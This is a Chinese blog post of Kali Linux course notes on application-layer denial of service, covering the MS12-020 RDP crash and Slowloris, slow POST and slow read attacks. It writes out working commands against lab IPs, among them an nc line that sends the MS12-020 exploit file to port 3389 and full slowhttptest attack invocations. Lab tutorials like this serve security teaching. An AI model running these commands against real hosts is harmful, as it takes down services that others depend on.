Kali Linux渗透测试 132 拒绝服务--应用层DoS 攻击

最新推荐文章于 2024-05-13 10:06:22 发布
最新推荐文章于 2024-05-13 10:06:22 发布
阅读量2.8k 收藏 8
点赞数 1
分类专栏: kali-linux 文章标签: kali-linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/79905182
版权

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 简介

  • 应用服务漏洞

    • 服务代码存在漏洞,遇异常提交数据时程序崩溃
    • 应用处理大量并发请求能力有限,被拒绝的是应用或OS

  • 缓冲区溢出漏洞

    • 向目标函数随机提交数据,特定情况下数据覆盖临近寄存器或内存
    • 影响: 远程代码执行、DOS
    • 利用模糊测试方法发现缓冲区溢出漏洞

  • CesarFTP 0.99 服务漏洞

    • ftp_fuzz.py # MKD/RMD

  • MS12-020 远程桌面协议DOS漏洞

2. 攻击测试 MS12-020

root@kali:~# searchsploit ms12-020
root@kali:~# cp /usr/share/exploitdb/exploits/windows/dos/18606.txt .
root@kali:~# mv 18606.txt  MS12-020.txt
root@kali:~# leafpad MS12-020.txt 
root@kali:~# nc 10.10.10.141 3389 < termdd_1.dat

3. Slowhttptest

  • Slowhttptest (源自google)

    • 低带宽应用层慢速DOS攻击(相对于CC等快速攻击而言的慢速)
    • 最早由Python编写,跨平台支持(Linux、win、Cygwin、OSX)
    • 尤其擅长攻击apache.tomcat (几乎百发百中)

  • 攻击方法

    • Slowloris、Slow HTTP POST 攻击
      • 耗尽应用的并发连接池,类似于Http层的Syn flood
      • HTTP协议默认在服务器全部接收请求之后才开始处理,若客户端发送速度缓慢或不完整 服务器时钟为其保留连接资源池占用,此类大量并发将导致DOS
      • Slowloris: 完整的http请求结尾是rnirn, 攻击发……
      • Slow POST: HTTP头content-length声明长度,但body部分缓慢发送

  • 攻击方法

    • Slow Read attack攻击
    • 与slowloris and slow POST目的相同,都是耗尽应用的并发连接池
    • 不同之处在于请求正常发送,但慢速读取响应数据
    • 攻击者调整TCPwindow窗口大小,是服务器慢速返回数据

  • 攻击方法

    • Apache Range Header attack
      • 客户端传输大文件时,体积查过HTTP Body大小限制时进行分段
      • 耗尽服务器CPU、内存资源

  • ulimite -n 70000

  • HTTP Post 攻击模式

    • slowhttptest -c 1000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://10.10.10.132 -x 10 -p 3

  • slowloris 攻击模式

    • slowhttptest -c 1000 -H -g -o header_stats -i 10 -r 200 -t GET -u http://10.10.10.132 -x 24 -p 3

  • 支持代理

  • 大量应用服务器和安全设备都无法防护慢速攻击

4. 攻击测试

root@kali:~# slowhttptest -c 60000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://10.10.10.132 -x 10 -p 3 -l 999999



root@kali:~# slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -s 8192 -t GET -u http://10.10.10.132 -x 10 -p 3




root@kali:~# man slowhttptest
网络安全打工人
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
slowhttptest-慢速拒绝服务攻击-针对应用
SCR_123的博客
08-16 3062
slowhttptest slowhttptest是实现慢速拒绝服务攻击的代表,提供四种方法实现目标连接池的耗尽,使得服务器完全无法接受新的请求。 HTTP应用拒绝服务攻击工具 利用低带宽慢速拒绝服务(http syn) 针对apache、tomcat(最新版本已修复此漏洞) ulimite -n 65539(修改,操作系统支持最大为65539) 支持代理 原理 大量消耗目标并发连接池:应用层的连接池一旦建立起来就不占用这个资源,若果许多连接都占在这里,不完全建立,就会占用着资源。 缓慢发送不完整的htt
Kali Linux安全渗透教程新手版
01-12
渗透测试的好工具!!详细讲解kali系统中的各种渗透测试工具的使用方法,很实用。
推荐开源项目:SlowHTTPTest —— 检验Web服务DoS安全的利器
最新发布
gitblog_00018的博客
05-13 471
推荐开源项目:SlowHTTPTest —— 检验Web服务DoS安全的利器 项目地址:https://gitcode.com/shekyan/slowhttptest 项目介绍 在当今数字化时代,网络安全是至关重要的。而 SlowHTTPTest 是一款高度可配置的工具,用于模拟应用拒绝服务DoS攻击,通过延长HTTP连接的方式进行测试。它可以帮助你检测你的web服务器是否存在DoS漏...
Slowhttptest攻击原理
hl1293348082的专栏
04-05 1032
Slowhttptest其实是一个DoS压力测试工具,它集成有三种慢速攻击模式(slowloris、slow http post、slow read attack),并且能导出日志报告,节约了部分写文档的时间,是一个特别好用且强大的工具,下面笔者将逐个分析它主要的攻击模式及防御方法。 0x01. Slowhttptest安装 Mac安装命令: brew update && brew install slowhttptest linux安装命令: apt-get update
Slowhttptest使用教程
汪敏的博客
07-06 1305
Slowhttptest使用教程。
Slowhttptest慢速攻击Slowloris模式攻击与检测
weixin_66959526的博客
04-12 5264
slowloris:完整的http请求是以 \r\n\r\n 结尾,攻击时仅发送 \r\n,少发送一个 \r\n,服务器认为请求还未发完,就会一直等待直至超时。 攻击代码如下 slowhttptest -c 7000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u "url" -x 24 -p 3 解析: -C 1000 (建立链接数1000个) -H (使用SlowLoris模式) -g(测试完成后建立统计数据) -o xxx(指定输出文.
kali-linux-2021.3-installer-amd64.part4.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用: kali-linux-2021.3-installer-amd64.part5.rar ... kali-linux-2021.3-installer-amd64....
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part2.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
Slowhttptest慢速攻击Slowread模式攻击与检测
weixin_66959526的博客
04-12 5994
攻击代码: slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u "url" -p 3 攻击代码解析: \\ -C 8000 (建立链接数8000个) -X (字节最大长度的跟踪数据结束) -r 200(每秒链接200个) -w(slow read模式中指定tcp窗口范围下限) -y 1024 (slow read模式中指定tcp窗口范围上限) -n 5(每次操作的间隔时间) -z 32 (在每次的read(...
Dos攻击修复(slowhttptest)
iokla
09-11 5306
Slow HTTP Denial of Service Attack 中文叫作缓慢的HTTP攻击漏洞,网上多数是tomcat的修复方法,然而实际上会碰到iis,nginx,apache等web服务器的这个问题,于是就有了这个修复集合。 漏洞描述: 利用的HTTP POST:POST的时候,指定一个非常大的content-length,然后以很低的速度发包,比如10-100s发一个字节,hold住这个连接不断开。这样当客户端连接多了后,占用住了webserver的所有可用连接,从而导致DOS。 修复方法: 对
NETGEAR拒绝连接请求_缓慢的Http拒绝服务攻击漏洞的验证(slowhttptest的安装)
weixin_39867066的博客
11-21 460
目录目录0x01 前言0x02 什么是Http拒绝服务攻击?0x02 如何验证(检测)Http拒绝服务攻击?0x03 修复建议请求头部分,设置超时时间初始为10秒,并在收到客户端发送的数据后,每接收到500字节数据就将超时时间延长1秒,但最长不超过40秒。可以防护slowloris型的慢速攻击。请求正文部分,设置超时时间初始为10秒,并在收到客户端发送的数据后,每接收到500字节数据就将...
SlowHTTPTest慢攻击测试
liushengbaba的专栏
10-09 1146
SlowHTTPTest是一个可配置的应用拒绝服务攻击测试攻击,它可以工作在Linux,OSX和Cygwin环境以及Windows命令行接口,可以帮助安全测试人员检验服务器对慢速攻击的处理能力。 这个工具可以模拟低带宽耗费下的DoS攻击,比如慢速攻击,慢速HTTP POST,通过并发连接池进行的慢速读攻击(基于TCP持久时间)等。慢速攻击基于HTTP协议,通过精心的设计和构造,这种特殊的请...
slowhttptest
自学编程_youkewang.top
10-02 1989
slowhttptest是一款Web压力测试软件,比LOIC牛逼多了,接下来我将介绍这款工具的安装和基本使用,高级的方法大家可以参考帮助和文档; 这种教程只能写得隐晦点,怕被查水表。。。 1:首先安装支持环境:libssl-dev,这里建立把工具安装在kali下面,因为kali集成了很多环境,不用我们自己再一个个安装。 图1-1. 2:通过git下载文件.
【安全牛苑房弘】Kali Linux 环境熟悉
萌宅鹿的技术小屋
02-29 4329
获取管理员权限 sudo -s 可读性较好的并且按照文件大小排序显示(参数为 time 则按时间排序) ls -lh --sort=size 打开文件 cat /var/log/messages 分页显示,一页显示为完则停止,Enter 继续显示下一行,q 退出 more /var/log/messgaes less 与 more 几乎一样,只是左下角不显示“已经显示数据的百分比” les...
SlowHTTPTest-慢速DoS攻击
weixin_34202952的博客
04-25 552
Slowhttptest是一个依赖于实际HTTP协议的Slow HTTP DoS攻击工具,它的设计原理是要求服务器所有请求被完全接收后再进行处理。 SlowHTTPTest是一款对服务器进行慢攻击测试软件,所谓的慢攻击就是相对于cc或者DDoS的快而言的,并不是只有量大速度快才能把服务器搞挂,使用慢攻击有时候也能到达同一效果。slowhttptest包含了之前几种慢攻击攻击方式,包括slow...
kali系统进行DoS攻击教程(虚拟机单人可玩)
2301_77296801的博客
09-06 1362
DoS攻击是指恶意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地耗尽被攻击对象的资源,目的是让目标计算机或网络无法提供正常的服务或资源访问,使目标系统服务系统停止响应甚至崩溃,而在此攻击中并不包括侵入目标服务器或目标网络设备。第三次握手:客户端收到服务器的SYN十ACK包,向服务器发送确认包ACK(ACK=j+1),此包发送完毕,客户端和服务器进入ESTABLISHED状态,完成三次握手,客户端与服务器开始传送数据。点击编辑-->虚拟网络编辑器-->添加网络-->vmnet 4-->修改。
精通Kali Linux 高级渗透测试2023版本,英文原版
07-12
Kali Linux作为一款强大的开源渗透测试工具,是学习者和专业渗透测试人员的必备资源,它提供了广泛的工具集和攻击模拟环境,以便进行系统评估、漏洞探测和道德黑客活动。 书中内容涵盖了从基础配置到高级技术的全面...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值